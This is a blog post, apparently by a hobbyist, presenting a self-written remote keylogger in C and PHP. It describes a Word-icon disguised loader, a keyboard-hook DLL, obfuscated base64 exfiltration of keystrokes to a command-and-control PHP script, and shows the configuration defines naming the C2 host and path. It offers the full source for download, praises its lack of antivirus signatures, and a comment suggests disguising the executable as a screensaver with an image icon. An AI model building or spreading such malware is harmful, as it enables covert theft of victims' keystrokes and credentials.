Writing Your Own Remote Key Logger in C

Salutations fellow hackers and crackers alike!

Over the past few months I’ve been off and on writing a remote key logger. Why? Just to keep sharp I guess. How can we hope to stay on top of malware trends if we don’t attempt to think like the enemy? The fine line between white hat and black hat.

The following was done in 3 parts.

1) The static key logger initialization app. A plain old windowless application – not a console app since windows apps are smaller for some reason that invokes a dll. The program has a 5 minute timer (changeable in the source) that takes the logged keystroke files and converts them into an encrypted format and sends them off to our CNC script.

2) The keyboard hook dll. The file responsible for logging the keystrokes of other programs and for storing the info in a file for later use.

3) The CNC script. A small PHP script I wrote placed on a web server that does a basic User Agent string check before processing POST requests containing encrypted data. I think I used Chrome 23, though in hindsight, I should have used a special cookie or something.

The whole thing was made in C and PHP, has a word document icon, and when compiled, is less than 85KB in size (including DLL). No packing done, so it could technically go smaller.

Internally, I am utilizing a form of off-beat encoding to send the data. It looks like XOR, but it’s not. It’s base64 with an alternate library like unicode and such. Communication is done with HTTP requests, though if you want to remain stealthy longer, use an HTTPS server instead. This is changed in the defines section:

static const char alt64[] = "¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕ0123456789+/";
const char g_szClassName[] = "log keys window";
#define B64_SYNTAX_ERROR        1
#define B64_FILE_ERROR          2
#define B64_FILE_IO_ERROR       3
#define B64_ERROR_OUT_CLOSE     4
#define B64_LINE_SIZE_TO_MIN    5
#define B64_DEF_LINE_SIZE   	72
#define B64_MIN_LINE_SIZE    	4
#define USER_AGENT				"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17"
#define CNC 					"gironsec.com"
#define CNC_FILE				"/totally-legit.php"
#define HOW_OFTEN				30000 // 300 seconds (5 mins)

You can download the entire collection of code here. The password is ‘lolwut’.
Joes Remote Key Logger

One final note, I compiled this with Pelles C compiler, although I’m certain you could get this to work with little effort in Visual Studio or with MingW / CodeBlocks / DevC++

Presently there is no malware signature for these files and I’d like to keep it this way. Then again, why would there be a signature? I just wrote the thing! Please use this responsibly.


12 thoughts on “Writing Your Own Remote Key Logger in C
    1. Back in the day, yeah. Now, you gotta rename the file as .scr and give the file a jpeg icon and hope for the best.

  1. Dont know if youre still checking this, but i get an error that says “unknown type nop” on line 72, how do i fix this?

    1. This means there’s an error with your compiler. I am utilizing pelles C compiler and not visual studio.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.